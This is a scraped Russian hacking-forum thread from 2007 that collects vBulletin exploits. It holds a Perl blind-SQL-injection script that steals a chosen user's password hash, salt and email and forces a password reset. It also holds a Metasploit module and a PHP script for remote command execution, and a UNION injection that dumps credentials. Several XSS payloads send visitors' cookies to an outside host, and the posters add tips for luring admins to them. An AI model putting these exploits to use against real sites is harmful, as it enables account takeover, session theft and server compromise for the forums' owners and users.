Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
02.03.2007, 17:56
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Ссылки на темы связанные с безопастностью (уязвимостями) vBulletin.
Vbulletin 3.6.x:
Нападение XSS на Vbulletin 3.6.x для НОВИЧКОВ.
----------------------------------------------------------
Все сообщения не содержащие информационной ценности или не имеющие прямого отношения к теме удалены.
----------------------------------------------------------
Ещё раз напомню, что в этой теме обзор уязвимостей форума, сообщения не имеющие информационной ценности ("Немогли бы взглянуть на этот форум", "Подскажите версию" и т.д.) будут удаляться.
Последний раз редактировалось Grey; 02.03.2007 в 20:45..
|
|
|
Vbulletin Petz module all version |
11.03.2007, 19:04
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553
Репутация:
1316
|
|
Vbulletin Petz module all version
Не смог найти тему куда выложить сплойт, выложил сюда, если что модеры перенесите.
Вообщем сплойт дёргает пароль у заданного юзера, если сплойт не остановить, то он этому юзеру еще и сменит пароль. Новый пароль из хеша состоит только из цифр размером 8 символов.
Код:
#!/usr/bin/perl
# Vbulletin module Petz with sql-injection.
# coded by k1b0rg(768620)
#
# This exploit changing your buyer.
# A new password consists of figures, the length of 8 and going to take a great brut of time(passwords pro);)
# If you do not need to change the password, simply stop exploit at the time of the removal of the password.
# Running exploit again sent two letters to the box. Be akkuratney.
# In the first test of vulnerability when sql error, the box webmaster sent a letter of error. Be akkuratney.
#
# dork: inurl:petz.php
#
# download module: http://dev.p3tz.com/
#
# Lamers go to жопа.
# exp: perl petz.pl -uhttp://forumteen.net/diendan/ -i1
#
# needly:
# mysql >=4
# magic_quotes off
# direct hands
#
# greets: antichat.ru mini-rinok.ru
#
use LWP::UserAgent;
use Getopt::Std;
use strict;
my %opts;
getopts("i:p:l:P:s:e:u:",\%opts);
my $url=$opts{u};
my $id=$opts{i} || 9107;
my $prefix=$opts{P} || '';
my $password1=$opts{p};
my $salt1=$opts{s};
my $length=$opts{l};
my $email1=$opts{e};
if(!$url || !$id)
{
echo('-------------------------FUCK YOU SPILBERG!----------------------');
echo('Petz sql injection');
echo('Founded and coded by k1b0rg(768620)');
echo('exp: perl petz.pl -uhttp://forumteen.net/diendan/ -i1');
echo('-------------------------FUCK YOU SPILBERG!----------------------');
exit;
}
my $browser = LWP::UserAgent->new();
$browser->requests_redirectable([]);
echo('Petz sql injection');
echo('Founded and coded by k1b0rg(768620)');
########check on vuln and getting prefix#######################################
echo('[\] Step 0: [Checking vuln]');
my $res=$browser->get($url.'petz.php?do=view&id=9995681\'');
if($res->content=~/Database error/i)
{
echo('[|] This script is vulnerable!!!!');
$res->content=~/LEFT JOIN (.*?)user/i;
echo('[/] Prefix is: ['.$1.']');
}
else
{
echo('[|] This script NOT vulnerable!!!!');
exit;
}
########password1#######################################
echo('[-] Step 1: [getting password(one) user by id ['.$id.']');
echo('[\] Password(1): [');
if(!$password1)
{
for(1..32)
{
my $pos=$_;
for(48..57,97..103)
{
my $asc=$_;
if($asc==103) {echo('EXPLOIT FAILED]',0); exit;}
my $res=$browser->get($url.'petz.php?do=stealitem&id=9995681\'+union+SELECT+666,666+FROM+'.$prefix.'user+WHERE+userid=\''.$id.'\'+and(ascii(substring(password,'.$pos.',1))='.$asc.')/*');
if($res->content!~/Untrapped Error/is) {echo(chr($asc),0); last; }
}
}
}
else
{
echo($password1,0);
}
echo(']',0);
########salt1#######################################
echo('[|] Step 2: [getting salt(one) user by id ['.$id.']');
echo('[-] Salt(1): [');
my $salt;
if(!$salt1)
{
for(1..3)
{
my $pos=$_;
for(33..126)
{
my $asc=$_;
my $res=$browser->get($url.'petz.php?do=stealitem&id=9995681\'+union+SELECT+666,666+FROM+'.$prefix.'user+WHERE+userid=\''.$id.'\'+and(ascii(substring(salt,'.$pos.',1))='.$asc.')/*');
if($res->content!~/Untrapped Error/is) {echo(chr($asc),0); $salt.=chr($asc); last; }
}
}
}
else
{
$salt=$salt1;
echo($salt,0);
}
echo(']',0);
########Checking email length#######################################
echo('[\] Step 3: [Checking email length ['.$id.']');
echo('[|] Email length: [');
my $num;
if(!$email1)
{
if(!$length)
{
for(6..32)
{
$num=$_;
my $res=$browser->get($url.'petz.php?do=stealitem&id=9995681\'+union+SELECT+666,666+FROM+'.$prefix.'user+WHERE+userid=\''.$id.'\'+and(length(email)='.$num.')/*');
if($res->content!~/Untrapped Error/is) {echo($num,0); last; }
}
}
else
{
$num=$length;
echo($num,0);
}
}
else
{
$num=length($email1);
echo($num,0);
}
echo(']',0);
########losting email#######################################
echo('[/] Step 4: [getting email user by id ['.$id.']');
echo('[-] Email: [');
my $email;
if(!$email1)
{
for(1..$num)
{
my $pos=$_;
for(48..57,64,97..122)
{
my $asc=$_;
my $res=$browser->get($url.'petz.php?do=stealitem&id=9995681\'+union+SELECT+666,666+FROM+'.$prefix.'user+WHERE+userid=\''.$id.'\'+and(ascii(lower(substring(email,'.$pos.',1)))='.$asc.')/*');
if($res->content!~/Untrapped Error/is) {echo(chr($asc),0); $email.=chr($asc); last; }
}
}
}
else
{
$email=$email1;
echo($email,0);
}
echo(']',0);
########lost_password#######################################
echo('[\] Step 5: [Losting password]');
$browser->post($url.'login.php',
[
email=>$email,
do=>'emailpassword'
]);
########losting activationid#######################################
echo('[|] Step 7: [getting activationid user by id ['.$id.']');
echo('[/] activationid: [');
my $valid;
for(1..8)
{
my $pos=$_;
for(48..57)
{
my $asc=$_;
my $res=$browser->get($url.'petz.php?do=stealitem&id=9995681\'+union+SELECT+666,666+FROM+'.$prefix.'useractivation+WHERE+userid=\''.$id.'\'+and(ascii(substring(activationid,'.$pos.',1))='.$asc.')/*');
if($res->content!~/Untrapped Error/is) {echo(chr($asc),0); $valid.=chr($asc); last; }
}
}
echo(']',0);
########lost_password#######################################
echo('[-] Step 8: [Losting password]');
$browser->get($url.'login.php?a=pwd&u='.$id.'&i='.$valid);
########password2#######################################
echo('[\] Step 9: [getting password(two) user by id ['.$id.']');
echo('[|] Password(2): [');
my $newhash;
for(1..32)
{
my $pos=$_;
for(48..57,97..102)
{
my $asc=$_;
my $res=$browser->get($url.'petz.php?do=stealitem&id=9995681\'+union+SELECT+666,666+FROM+'.$prefix.'user+WHERE+userid=\''.$id.'\'+and(ascii(substring(password,'.$pos.',1))='.$asc.')/*');
if($res->content!~/Untrapped Error/is) {echo(chr($asc),0); $newhash.=chr($asc); last; }
}
}
echo(']',0);
echo('News hash && salt: ['.$newhash.':'.$salt.']');
sub echo{
my $text=shift;
my $param=shift;
my $razdel=($param eq 0)?'':"\n";
syswrite STDOUT,$razdel.$text;
}
Последний раз редактировалось k1b0rg; 13.03.2007 в 22:53..
|
|
|
|
Passive XSS [downloads.php] vBulletin 3.6.2 |
17.04.2007, 21:10
|
|
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499
Репутация:
807
|
|
Passive XSS [downloads.php] vBulletin 3.6.2
vBulletin 3.6.2
Пассивная хсс
Уязвим параметр "id" скрипта "downloads.php"
Пример:
http://forum.asechka.ru/downloads.php?do=cat&id=5"><script>alert()</script>
Последний раз редактировалось Elekt; 03.09.2008 в 02:47..
|
|
|
|
XSS [PDF] vBulletin 3.0.7 - 3.6.2 |
29.04.2007, 17:53
|
|
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499
Репутация:
807
|
|
XSS [PDF] vBulletin 3.0.7 - 3.6.2
vBulletin 3.0.7 - 3.6.2
Активная хсс
прикрепляем файл pdf созданный с содержанием:
Код:
<script>alert()</script>
и при открытии этого файла вылезает алерт.
этот способ работает в очень многих местах, также как и встраивание кода в картинку. минус этого способа, что не во всех местах можно прикреплять файлы.
Последний раз редактировалось Elekt; 03.09.2008 в 02:46..
|
|
|
|
Active XSS in Title vBulletin 3.5.2 |
18.05.2007, 11:27
|
|
Новичок
Регистрация: 21.11.2006
Сообщений: 29
Провел на форуме:
90591
Репутация:
33
|
|
Active XSS in Title vBulletin 3.5.2
Программа: vBulletin 3.5.2
http://www.securitylab.ru/vulnerability/source/243694.php
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных в параметре «title» сценарием calendar.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Код:
TITLE:--------->Test<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
BODY:---------->No matter
OTHER OPTIONS:->No matter
Пояснение: заходим в календарь, жмём создать новое событие, и в заголовке прописываем <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>, смотрим ссылку на наше событие и впариваем её тому у кого хотим украсть cookie.
Последний раз редактировалось Elekt; 03.09.2008 в 02:46..
|
|
|
|
23.05.2007, 12:21
|
|
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
Провел на форуме:
1310036
Репутация:
726
|
|
vBulletin 3.0.10
SQL Injection
Код:
http://123.com/portal.php?id=54&a=viewfeature&featureid=99999/**/UNION/**/SELECT/**/0,1,2,3,4,username,6,7,8,9,10,11,12,password/**/from/**/user/**/where/**/userid=1/*
vBulletin 3.0.6
Command Execution Exploit (metasploit)
Код:
##
# Title: vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit
# Name: php_vb3_0_6.pm
# License: Artistic/BSD/GPL
# Info: trying to get the command execution exploits out of the way on milw0rm.com. M's are always good.
#
#
# - This is an exploit module for the Metasploit Framework, please see
# http://metasploit.com/projects/Framework for more information.
##
package Msf::Exploit::php_vb3_0_6;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;
my $advanced = { };
my $info = {
'Name' => 'vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit',
'Version' => '$Revision: 1.0 $',
'Authors' => [ 'str0ke' ],
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
'RPATH' => [1, 'DATA', 'Path to the misc.php script', '/forum/misc.php'],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a code execution flaw in vBulletin <= 3.0.6.
}),
'Refs' =>
[
['MIL', '832'],
],
'Payload' =>
{
'Space' => 512,
'Keys' => ['cmd', 'cmd_bash'],
},
'Keys' => ['vBulletin'],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $vhost = $self->GetVar('VHOST') || $target_host;
my $path = $self->GetVar('RPATH');
my $cmd = $self->GetVar('EncodedPayload')->RawPayload;
# Encode the command as a set of chr() function calls
my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));
# Create the get request data
my $data = "?do=page&template={\${passthru($byte)}}";
my $req =
"GET $path$data HTTP/1.1\r\n".
"Host: $vhost:$target_port\r\n".
"Content-Type: application/html\r\n".
"Content-Length: ". length($data)."\r\n".
"Connection: Close\r\n".
"\r\n";
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError){
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
$self->PrintLine("[*] Sending the malicious vBulletin Get request...");
$s->Send($req);
my $results = $s->Recv(-1, 20);
$s->Close();
return;
}
1;
vBulletin 3.0.4
Execute command
magic_quotes_gpc должен быть выключен
PHP код:
<?php
if (!(function_exists('curl_init'))) {
echo "cURL extension required\n";
exit;
}
if ($argv[3]){
$url = $argv[1];
$forumid = intval($argv[2]);
$command = $argv[3];
}
else {
echo "vbulletin 3.0 > 3.0.4 execute command by AL3NDALEEB al3ndaleeb[at]uk2.net\n\n";
echo "Usage: ".$argv[0]." <url> <forumid> <command> [proxy]\n\n";
echo "<url> url to vbulletin site (ex: http://www.vbulletin.com/forum/)\n";
echo "<forumid> forum id\n";
echo "<command> command to execute on server (ex: 'ls -la')\n";
echo "[proxy] optional proxy url (ex: http://proxy.ksa.com.sa:8080)\n\n";
echo "ex :\n";
echo "\tphp vb30x.php http://www.vbulletin.com/forum/ 2 \"ls -al\"";
exit;
}
if ($argv[4])
$proxy = $argv[4];
$action = 'forumdisplay.php?GLOBALS[]=1&f='.$forumid.'&comma=".`echo _START_`.`'.$command.'`.`echo _END_`."';
$ch=curl_init();
if ($proxy){
curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url.'/'.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res=curl_exec ($ch);
curl_close ($ch);
$res = substr($res, strpos($res, '_START_')+7);
$res = substr($res,0, strpos($res, '_END_'));
echo $res;
?>
Последний раз редактировалось Grey; 23.05.2007 в 12:34..
Причина: Удалил все, что есть в ранее написанных сообщениях.
|
|
|
|
05.07.2007, 19:52
|
|
Познающий
Регистрация: 06.06.2007
Сообщений: 83
Провел на форуме:
404154
Репутация:
140
|
|
узнать версию форума
Вот что нашел.. Чтобы узнать версию форума.. иногда помогает..
http://domain/forum/install/finalupgrade.php
И видим версию форума 
Последний раз редактировалось Elekt; 03.09.2008 в 02:45..
|
|
|
|
08.07.2007, 17:01
|
|
Новичок
Регистрация: 04.07.2007
Сообщений: 26
Провел на форуме:
134504
Репутация:
7
|
|
Active XSS v3.6.8
тут вроде бы не звучало еще 2 ХССки...
не знаю точно в каких версиях но на 3.6.2 и 3.6.4 помоему работало...
В первом случае надо быть модератором (иметь право банить) и надо чтоб на форуме при бане было поле "причина"
вот само поле "причина" и есть уязвимым... ищем жертву для бана и в причине вписываем
Код:
Забанен за флуд <script>img = new Image(); img.src = "http://somesite.#ru/vash sniffer.jpg?"+document.cookie;</script>
теперь допустим хотим словить админа - скажите пусть зайдет посмотрит почему забанен пользователь или попросить разбанить из-за ошибки ( в общем придумать причину не тяжело) )
Во втором случае надо иметь возможность менять себе "Особый статус" и поддержку хтмл...
Код:
Мой титул <script>img = new Image(); img.src = "http://somesite.#ru/vash sniffer.jpg?"+document.cookie;</script>
А там думаю загадочного нечего нету ))
но это испытывал всего один раз... надо быть или знакомым админа или еще какието обстоятельство ))
_На некоторых сайтах стоит фикс типа ограничения колиества символов в строке )
--------------------------------------------------------------------
Добавленно от BlackCats (фактически тоже самое инфа про версию другая):
3.6.8 Patch.Level 1
active xss:
если вы модератор на форуме, то при бане в поле " причина бана" указываете ваш скрипт, и он сработает:
при просмотре забаненых пользователей через:
модпанель(например туда может зайти СуперМодератор)
админ панель(админ)
когда зайдёт юзер в свой акк(сам юзер)
PHP код:
clientscript/ieprompt.html
какойто недописанный скрипт.
PHP код:
global.php или arhive/global.php
в некоторых случаях
раскрытие путей
Последний раз редактировалось Elekt; 03.09.2008 в 02:45..
|
|
|
|
Active XSS in Tag [google] & [googlevideo] |
13.07.2007, 05:14
|
|
Banned
Регистрация: 01.08.2006
Сообщений: 725
Провел на форуме:
7681825
Репутация:
4451
|
|
Active XSS in Tag [google] & [googlevideo]
Активная xss в популярном теге для булки - google и googlevideo
Код:
[google*video][U*RL=/onmouseover=alert(1);a="]213[/U*RL][/google*video]123
[google][U*RL=/onmouseover=alert(1);a="]213[/U*RL][/google]123
Последний раз редактировалось Elekt; 03.09.2008 в 02:44..
|
|
|
|
15.08.2007, 12:56
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074
Репутация:
257
|
|
Code Exec + Xss
vBulletin v3.6.5
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
[site]/vb/includes/functions.php?classfile=[Shell-Attack]
[site]/vb/includes/functions_cron.php?nextitem=[Shell-Attack]
[site]/vb/includes/functions_forumdisplay.php?specialtemplates=[Shell-Attack]
vBulletin V3.6.8
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных во множестве сценариев множеством параметров. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
[site]/[path]/faq.php?s=&do=search&q=%22%3E%3C%2Fscript%3E%3Cscr ipt%3Ealert%28document.cookie%29%3B%3C%2Fscript&ma tch=
all&titlesonly=0
[site]/[path]/member.php?u=1=s'&do=search&q=%22%3E%3C%2Fscript%3 E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2F
script&match=all&titlesonly=1
[site]/[path]/index.php?s=<script>alert('document.cookie')</script>
[site]/[path]/faq.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Csc ript%3Ealert%28document.cookie%29%3B%3C%2Fscript
&match=all&titlesonly=0
[site]/[path]/memberlist.php?s="&do=search&q=%22%3E%3C%2Fscript% 3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2
Fscript&match=all&titlesonly=0
[site]/[path]/calendar.php?s="&do=search&q=%22%3E%3C%2Fscript%3E %3Cscript%3Ealert%28document.cookie%29%3B%3C%2F
script&match=all&titlesonly=0
[site]/[path]/search.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3 Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscrip t
&match=all&titlesonly=0
[site]/[path]/search.php?do=getdaily"&do=search&q=%22%3E%3C%2Fsc ript%3E%3Cscript%3
Ealert%28document.cookie
%29%3B%3C%2Fscript&match=all&titlesonly=0
[site]/[path]/forumdisplay.php?s="&do=search&q=%22%3E%3C%2Fscrip t%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2 Fscript
&match=all&titlesonly=0
[site]/[path]/forumdisplay.php?do=markread"&do=search&q=%22%3E%3 C%2Fscript%3E%3Cscript%3E
alert%28document.cookie
%29%3B%3C%2Fscript&match=all&titlesonly=0
[site]/[path]/forumdisplay.php?f=1"&do=search&q=%22%3E%3C%2Fscri pt%3E%3Cscript%3Ealert%28document.cookie
%29%3B%3C%2Fscript&match=all&titlesonly=0
[site]/[path]/showgroups.php?s="&do=search&q=%22%3E%3C%2Fscript% 3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fs cript&
match=all&titlesonly=0
[site]/[path]/online.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3 Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscrip t&
match=all&titlesonly=0
[site]/[path]/member.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3 Cscript%3Ealert%28document.cookie%29%3B%3C%2F
script&match=all&titlesonly=0
[site]/[path]/sendmessage.php?s="&do=search&q=%22%3E%3C%2Fscript %3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2F
script&match=all&titlesonly=0
Источник www.securitysib.com
Последний раз редактировалось Elekt; 03.09.2008 в 02:43..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
